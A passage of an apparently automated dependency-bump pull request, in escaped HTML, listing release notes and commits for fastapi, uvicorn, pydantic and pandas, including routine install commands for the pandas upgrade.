href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.136.1...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uvicorn` from 0.45.0 to 0.48.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/releases\"\u003euvicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.48.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2940\"\u003eKludex/uvicorn#2940\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2944\"\u003eKludex/uvicorn#2944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2919\"\u003eKludex/uvicorn#2919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2920\"\u003eKludex/uvicorn#2920\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers by \u003ca href=\"https://github.com/eltoder\"\u003e\u003ccode\u003e@​eltoder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2927\"\u003eKludex/uvicorn#2927\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2915\"\u003eKludex/uvicorn#2915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2916\"\u003eKludex/uvicorn#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2917\"\u003eKludex/uvicorn#2917\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/blob/main/docs/release-notes.md\"\u003euvicorn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.48.0 (May 24, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 14, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2920\"\u003e#2920\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2919\"\u003e#2919\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (April 23, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2915\"\u003e#2915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in \u003ccode\u003ewebsockets-sansio\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2917\"\u003e#2917\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/73e84e58d7f6b8b3dfd8a9e3e42d716862250f33\"\u003e\u003ccode\u003e73e84e5\u003c/code\u003e\u003c/a\u003e Version 0.48.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2951\"\u003e#2951\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/45ea11690b4a62fa6df339d2b6ee3b8545a418e0\"\u003e\u003ccode\u003e45ea116\u003c/code\u003e\u003c/a\u003e Ignore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/dd4394c3cbfd9f27a696a7b08047149690058158\"\u003e\u003ccode\u003edd4394c\u003c/code\u003e\u003c/a\u003e chore(deps): bump idna from 3.11 to 3.15 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2941\"\u003e#2941\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/abe07818a191cd036dc3824d802d052207e01c7e\"\u003e\u003ccode\u003eabe0781\u003c/code\u003e\u003c/a\u003e Default \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/479a2c0c89186714f1aac52aecdebebf271395ac\"\u003e\u003ccode\u003e479a2c0\u003c/code\u003e\u003c/a\u003e Version 0.47.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2937\"\u003e#2937\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/89347fd166ebedf98fb3f806ce8ea44e93b1c2b5\"\u003e\u003ccode\u003e89347fd\u003c/code\u003e\u003c/a\u003e Add 7-day cooldown for dependency resolution via uv exclude-newer (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2936\"\u003e#2936\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/767315b38ae509cee9fe8ee9d09f6da920536096\"\u003e\u003ccode\u003e767315b\u003c/code\u003e\u003c/a\u003e Drop unused contents/actions permissions from zizmor workflow (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2935\"\u003e#2935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/f25ee43e68a9678453cbca99ad96f1a447ff34af\"\u003e\u003ccode\u003ef25ee43\u003c/code\u003e\u003c/a\u003e chore(deps): bump urllib3 from 2.6.3 to 2.7.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2933\"\u003e#2933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/8782666189a3d36c978de5698620db705659bf44\"\u003e\u003ccode\u003e8782666\u003c/code\u003e\u003c/a\u003e Fix typo in \u003ccode\u003edocs/deployment/index.md\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2932\"\u003e#2932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/ad5ff87c869e8a34e9b04fcd5ca38d65c526893c\"\u003e\u003ccode\u003ead5ff87\u003c/code\u003e\u003c/a\u003e Treat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.48.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic` from 2.13.3 to 2.13.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/releases\"\u003epydantic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.13.4 2026-05-06\u003c/h2\u003e\n\u003ch2\u003ev2.13.4 (2026-05-06)\u003c/h2\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump libc from 0.2.155 to 0.2.185 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13109\"\u003e#13109\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdapt \u003ccode\u003epydantic-core\u003c/code\u003e linker flags on macOS by \u003ca href=\"https://github.com/washingtoneg\"\u003e\u003ccode\u003e@​washingtoneg\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13147\"\u003e#13147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve \u003ccode\u003eRootModel\u003c/code\u003e core metadata by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13129\"\u003e#13129\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.13.3...v2.13.4\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.13.3...v2.13.4\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/blob/main/HISTORY.md\"\u003epydantic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.13.4 (2026-05-06)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.13.4\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump libc from 0.2.155 to 0.2.185 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13109\"\u003e#13109\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdapt \u003ccode\u003epydantic-core\u003c/code\u003e linker flags on macOS by \u003ca href=\"https://github.com/washingtoneg\"\u003e\u003ccode\u003e@​washingtoneg\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13147\"\u003e#13147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve \u003ccode\u003eRootModel\u003c/code\u003e core metadata by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13129\"\u003e#13129\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/cf67d4b3193c3fe43ede18612ed62785eee11382\"\u003e\u003ccode\u003ecf67d4b\u003c/code\u003e\u003c/a\u003e Fix linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/f0d8a214a5803036db46a56b1f62f1e56b81d662\"\u003e\u003ccode\u003ef0d8a21\u003c/code\u003e\u003c/a\u003e Prepare release v2.13.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5e3fe1d41a00f441204241c66078003ae0391f9a\"\u003e\u003ccode\u003e5e3fe1d\u003c/code\u003e\u003c/a\u003e Check for pydantic tag pattern in CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/7f9edcc2a191d2eaa9751220eb910914e716a686\"\u003e\u003ccode\u003e7f9edcc\u003c/code\u003e\u003c/a\u003e Document tagging conventions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/b46a0c9b8a4dd967fda8ec1a92f6437076bf262c\"\u003e\u003ccode\u003eb46a0c9\u003c/code\u003e\u003c/a\u003e Adapt \u003ccode\u003epydantic-core\u003c/code\u003e linker flags on macOS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/50629c851e61d887d5420452c311ec6203f1f400\"\u003e\u003ccode\u003e50629c8\u003c/code\u003e\u003c/a\u003e Update to PyPy 7.3.22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/8522ebb71e5e9a6f7188af5f009f01785b8cf725\"\u003e\u003ccode\u003e8522ebb\u003c/code\u003e\u003c/a\u003e Preserve \u003ccode\u003eRootModel\u003c/code\u003e core metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/a37f3aff090ca342dc5f48304889963530b993f8\"\u003e\u003ccode\u003ea37f3af\u003c/code\u003e\u003c/a\u003e Adapt \u003ccode\u003eMISSING\u003c/code\u003e sentinel test to work with unreleased \u003ccode\u003etyping_extensions\u003c/code\u003e ver...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/909259a9df660518033aa686b689f045a6eaf9d2\"\u003e\u003ccode\u003e909259a\u003c/code\u003e\u003c/a\u003e Remove Logfire example in documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/2c4174c366606fc2dc46cb806833a080aefa77df\"\u003e\u003ccode\u003e2c4174c\u003c/code\u003e\u003c/a\u003e Bump libc from 0.2.155 to 0.2.185\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.13.3...v2.13.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pandas` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pandas-dev/pandas/releases\"\u003epandas's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003epandas 3.0.3\u003c/h2\u003e\n\u003cp\u003eWe are pleased to announce the release of pandas 3.0.3.\nThis is a patch release in the 3.0.x series and includes some regression fixes and bug fixes. We recommend that all users of the 3.0.x series upgrade to this version.\u003c/p\u003e\n\u003cp\u003eSee the \u003ca href=\"https://pandas.pydata.org/docs/whatsnew/v3.0.3.html\"\u003efull whatsnew\u003c/a\u003e for a list of all the changes.\u003c/p\u003e\n\u003cp\u003ePandas 3.0 supports Python 3.11 and higher.\nThe release can be installed from PyPI:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epython -m pip install --upgrade pandas==3.0.*\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eOr from conda-forge\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003econda install -c conda-forge pandas=3.0\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003ePlease report any issues with the release on the \u003ca href=\"https://github.com/pandas-dev/pandas/issues\"\u003epandas issue tracker\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThanks to all the contributors who made this release possible.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/72f2fea91530b5abb3cf2100cb22d84e504695c0\"\u003e\u003ccode\u003e72f2fea\u003c/code\u003e\u003c/a\u003e RLS: 3.0.3 (\u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65590\"\u003e#65590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/2897590094c2b6e3962d01a82665936f30be563d\"\u003e\u003ccode\u003e2897590\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65436\"\u003e#65436\u003c/a\u003e on branch 3.0.x (Account for privatization of matplotlib `...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/49894b5b6037c50f6444504070d9b1e8e514001a\"\u003e\u003ccode\u003e49894b5\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65499\"\u003e#65499\u003c/a\u003e on branch 3.0.x (BUG: fix check if pyarrow is installed in...\u003c/li\u003e\n\u003cli\u003e\u003ca 